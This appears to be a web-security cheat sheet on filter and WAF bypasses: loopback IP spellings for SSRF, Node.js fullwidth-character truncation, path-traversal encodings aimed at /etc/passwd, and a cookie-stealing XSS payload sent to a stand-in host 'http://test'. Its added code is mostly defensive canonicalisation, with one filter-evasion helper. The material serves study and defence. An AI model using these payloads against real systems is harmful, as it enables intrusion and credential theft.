IP addresses
127.0.0.1 can also be written as:
- 127.1 (short form: the last part fills all remaining bytes)
- 2130706433 (decimal)
- 0x7f000001 (hex)
- 017700000001 (octal)
- spoofed.burpcollaborator.net, or any hostname you control whose DNS record points to 127.0.0.1
- or an IDN/punycode spelling of the hostname
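The spellings in the list above are all accepted by the classic inet_aton() grammar (BSD/glibc, and the same rules the WHATWG URL parser applies to IPv4 hosts): one to four dot-separated parts, each decimal, octal (leading 0) or hex (0x), with the last part spanning the remaining bytes. The parser below is an added example, not code from the original page; it canonicalises those forms so an SSRF deny-list can compare addresses instead of strings. Function names are mine.

```javascript
// Added example, not from the original page: parse inet_aton()-style IPv4
// spellings back to dotted-quad form. Returns null for anything that is not
// a valid IPv4 literal (a hostname, an out-of-range part, an empty part).
function parseIPv4Lenient(host) {
  const parts = host.split('.');
  if (parts.length > 4) return null;
  const nums = [];
  for (const p of parts) {
    let n;
    if (/^0[xX][0-9a-fA-F]+$/.test(p)) n = parseInt(p.slice(2), 16); // hex
    else if (/^0[0-7]+$/.test(p)) n = parseInt(p, 8);                // octal
    else if (/^[0-9]+$/.test(p)) n = parseInt(p, 10);                // decimal
    else return null;
    nums.push(n);
  }
  const last = nums.pop();
  if (nums.some(n => n > 0xff)) return null;
  const lastBytes = 4 - nums.length;          // bytes the final part must fill
  if (last >= 2 ** (8 * lastBytes)) return null;
  // Assemble the 32-bit value with arithmetic (JS bit operators are signed 32-bit).
  let value = 0;
  for (const n of nums) value = value * 256 + n;
  value = value * 2 ** (8 * lastBytes) + last;
  return [24, 16, 8, 0].map(s => Math.floor(value / 2 ** s) % 256).join('.');
}

// Naive SSRF deny-list: compares the host exactly as the user wrote it.
function naiveIsLoopback(host) {
  return host === '127.0.0.1' || host === 'localhost';
}

// Canonicalising check: normalise the literal first, then look at the address.
function isLoopback(host) {
  const canon = parseIPv4Lenient(host);
  return host === 'localhost' || (canon !== null && canon.startsWith('127.'));
}
```

Note that `0x7e000001` (a common typo for the hex form) canonicalises to 126.0.0.1, not loopback; checking the parsed value rather than eyeballing the spelling avoids that mistake too. Browsers and Node's `new URL()` perform the same canonicalisation on the hostname, so `http://2130706433/` already reaches 127.0.0.1 without any help from the target.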
Unicode truncation in Node.js (U+FF2E)
When Node.js writes a JavaScript string to the wire as latin1/binary (for example a request path built from user input), each code point above U+00FF keeps only its low byte: U+FF2E (fullwidth N) becomes 0x2E, i.e. ".", and U+FF2F (fullwidth O) becomes 0x2F, i.e. "/". A path that contains no ".." when the application checks it does contain one once it has been sent:
http://test/\uFF2E\uFF2E/passwd
http://test/~~\uFF~~2E~~\uFF~~2E/passwd (the high byte of each character is dropped)
http://test/../passwd
The same works for \x0D\x0A: U+FF0D U+FF0A come out as CR LF, which gives request splitting ;) src: PortSwigger
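The truncation described above, reproduced with Node's own Buffer API as an added example (not code from the original page). `Buffer.from(str, 'latin1')` keeps only the low byte of each UTF-16 code unit, which is exactly the behaviour the payload relies on; the payload strings and the two filter functions are constructed here.

```javascript
// Added example, not from the original page. Shows what a latin1-encoded path
// looks like on the wire, why a filter run on the JavaScript string misses the
// traversal, and a check that refuses anything the encoding would truncate.

// The bytes Node.js sends for a path encoded as latin1/binary, returned as a
// string so they can be compared with what a filter expects to see.
function latin1Wire(str) {
  return Buffer.from(str, 'latin1').toString('latin1');
}

// Naive filter: inspects the JavaScript string before it is encoded.
function looksSafe(path) {
  return !path.includes('..') && !/[\r\n]/.test(path);
}

// Hardened version: refuse anything that does not survive the encoding
// unchanged, then run the check on the bytes that will actually be sent.
// (Current Node.js http.request refuses such request paths itself.)
function safeToSend(path) {
  for (const ch of path) {
    if (ch.codePointAt(0) > 0xff) return false; // would be truncated on the wire
  }
  return looksSafe(latin1Wire(path));
}

// Constructed payloads: U+FF2E -> 0x2E ".", U+FF2F -> 0x2F "/",
// U+FF0D U+FF0A -> 0x0D 0x0A (CRLF, the start of a second request line).
const dotDot    = '/\uFF2E\uFF2E/passwd';              // "/../passwd" on the wire
const dotDotAll = '/\uFF2E\uFF2E\uFF2Fpasswd';         // same, slash truncated too
const crlfSplit = '/api\uFF0D\uFF0AX-Injected: 1';     // header injection on the wire
```

Run `looksSafe(dotDot)` and `looksSafe(latin1Wire(dotDot))` side by side: the first says the path is clean, the second sees `/../passwd`. Validating the encoded bytes, or rejecting code points above U+00FF outright as `safeToSend` does, closes the gap.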
A backend-for-frontend proxy refuses a plain backslash traversal:
GET /bff/proxy/stream/v1/users/me/streamItems/..\..\ HTTP/1.1
HTTP/1.1 403 Forbidden
Changing the path to
GET /bff/proxy/stream/v1/me/streamItems/web\..\.\..\ HTTP/1.1
gets past the filter, and the back end answers with its own JSON error format, i.e. a different server than the one that sent the 403:
{
"errors": [
{
"message": "Not Found",
"errorCode": 404,
...
src: Sam Curry
WAF bypass
[WAF bypass](https://blog.isec.pl/waf-evasion-techniques/)
Superfluous URL decode: the WAF matches on the request as it arrives, but the back end decodes it (once more) before using it, so encode one layer deeper than the WAF looks:
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../../etc/passwd
or double encoded (decoded twice before use):
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../../etc/passwd
or non-standard encodings of "/" that a lenient decoder still accepts. Overlong UTF-8: %c0%af is a two-byte encoding of 0x2f, which a strict UTF-8 decoder must reject:
..%c0%af..%c0%af..%c0%afetc/passwd
or the fullwidth solidus U+FF0F (%ef%bc%8f), which Unicode compatibility normalisation (NFKC) folds to "/":
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
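The backslash request above and the encoding tricks in this section are the same failure seen from two sides: a filter that looks at the raw path while the back end normalises it. The block below is an added example (not code from the original page or from the sources it cites) that models such a permissive back end: repeated percent-decoding, a UTF-8 decoder that accepts overlong sequences, fullwidth-to-ASCII folding, and backslash-as-separator, so a check can be run on the canonical path instead. The raw-string WAF rule is an assumption chosen because it explains the 403/404 pair above; all function names are mine.

```javascript
// Added example, not from the original page. Models a permissive back end so
// a filter can compare the canonical path instead of the raw bytes. The
// decoder is deliberately loose to mirror a vulnerable server; it is not any
// particular product.

const isHex = b => (b >= 0x30 && b <= 0x39) || (b >= 0x41 && b <= 0x46) || (b >= 0x61 && b <= 0x66);

// UTF-8 decoder that ACCEPTS overlong sequences, so %c0%af yields "/".
// A strict decoder rejects these (RFC 3629); that laxness is the bug modelled.
function lenientUtf8Decode(bytes) {
  let s = '';
  for (let i = 0; i < bytes.length; ) {
    const b = bytes[i];
    let need, cp;
    if (b < 0x80) { need = 0; cp = b; }
    else if (b >= 0xc0 && b < 0xe0) { need = 1; cp = b & 0x1f; }
    else if (b >= 0xe0 && b < 0xf0) { need = 2; cp = b & 0x0f; }
    else if (b >= 0xf0 && b < 0xf8) { need = 3; cp = b & 0x07; }
    else { s += '\ufffd'; i++; continue; }
    let j = 1;
    for (; j <= need && i + j < bytes.length && (bytes[i + j] & 0xc0) === 0x80; j++) {
      cp = (cp << 6) | (bytes[i + j] & 0x3f);
    }
    if (j <= need || cp > 0x10ffff) { s += '\ufffd'; i++; continue; } // truncated or invalid
    s += String.fromCodePoint(cp);
    i += need + 1;
  }
  return s;
}

// One layer of percent-decoding; malformed escapes are passed through untouched.
function percentDecodeOnce(str) {
  const src = Buffer.from(str, 'utf8');
  const out = [];
  for (let i = 0; i < src.length; i++) {
    if (src[i] === 0x25 && i + 2 < src.length && isHex(src[i + 1]) && isHex(src[i + 2])) {
      out.push(parseInt(String.fromCharCode(src[i + 1], src[i + 2]), 16));
      i += 2;
    } else {
      out.push(src[i]);
    }
  }
  return lenientUtf8Decode(out);
}

// Fold fullwidth ASCII variants (U+FF01..U+FF5E) to ASCII, as NFKC does.
function foldFullwidth(str) {
  return Array.from(str, ch => {
    const cp = ch.codePointAt(0);
    return cp >= 0xff01 && cp <= 0xff5e ? String.fromCodePoint(cp - 0xfee0) : ch;
  }).join('');
}

// Decode up to maxLayers times, treat "\" as "/", resolve "." and "..".
// `escaped` counts ".." segments that tried to climb above the root.
function canonicalizePath(rawPath, maxLayers = 3) {
  let s = rawPath;
  for (let n = 0; n < maxLayers && s.includes('%'); n++) s = percentDecodeOnce(s);
  s = foldFullwidth(s).replace(/\\/g, '/');
  const segs = [];
  let escaped = 0;
  for (const seg of s.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg !== '..') segs.push(seg);
    else if (segs.length) segs.pop();
    else escaped++;
  }
  return { path: '/' + segs.join('/'), escaped };
}

// Hypothetical raw-string WAF rule (an assumption that explains the 403/404
// pair above): block "/.." or "../" as written, without decoding or normalising.
function rawRuleBlocks(rawPath) {
  return /\/\.\.|\.\.\//.test(rawPath);
}

// Canonical check: the request must stay at or below `base` after normalising.
function staysUnder(rawPath, base) {
  const c = canonicalizePath(rawPath);
  return c.escaped === 0 && (c.path === base || c.path.startsWith(base + '/'));
}
```

`rawRuleBlocks` stops `streamItems/..\..\` but not `streamItems/web\..\.\..\`, nor any of the encoded payloads in this section; `staysUnder` rejects all of them because it looks at where the path ends up. The `maxLayers` cap matters: a back end that decodes exactly once is not reached by a triple-encoded payload, so a model that decodes forever would produce false positives.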
JavaScript objects
You can write
document.location='http://test?q='+document.cookie
as
window["document"]["location"]="http://test?q="+window["document"]["cookie"]
when the filter rejects the . (0x2e): every property access can be spelled in bracket notation with a string key, and because window is the global object, document is reachable as window["document"].
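A small rewriter for the trick above, as an added example (not code from the original page): it turns a dotted property chain into bracket notation, offers a template-literal variant for filters that also reject quotes, and evaluates both against a constructed stand-in for the browser's window object so the equivalence can be checked under Node. The filter function and the stub are assumptions made here.

```javascript
// Added example, not from the original page: rewrite dotted property access
// so the payload contains no "." (0x2e), and show it resolves to the same value.

// document.cookie -> window["document"]["cookie"]
function toBracketChain(dotted, root = 'window') {
  return root + dotted.split('.').map(p => '["' + p + '"]').join('');
}

// Variant for filters that reject quotes as well: template literals are valid
// property keys inside brackets and need neither "." nor a quote character.
function toTemplateChain(dotted, root = 'window') {
  return root + dotted.split('.').map(p => '[`' + p + '`]').join('');
}

// Hypothetical filter: blocks any payload that contains a dot.
function dotFilterBlocks(payload) {
  return payload.includes('.');
}

// Evaluate an expression with `window` and `document` bound to the stub,
// the way a browser would resolve those identifiers.
function evaluateOn(win, expr) {
  return new Function('window', 'document', 'return (' + expr + ')')(win, win.document);
}

// Constructed stand-in for the browser's global object.
const fakeWindow = { document: { cookie: 'session=abc123', location: 'http://app/' } };
fakeWindow.window = fakeWindow;
```

The page's own `document.location='http://test?q='+document.cookie` becomes `window["document"]["location"]="http://test?q="+window["document"]["cookie"]` through `toBracketChain`; the assignment target and the value are just two chains joined by the rest of the payload.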
More references
- OWASP XSS Filter Evasion Cheat Sheet
- PortSwigger XSS cheat sheet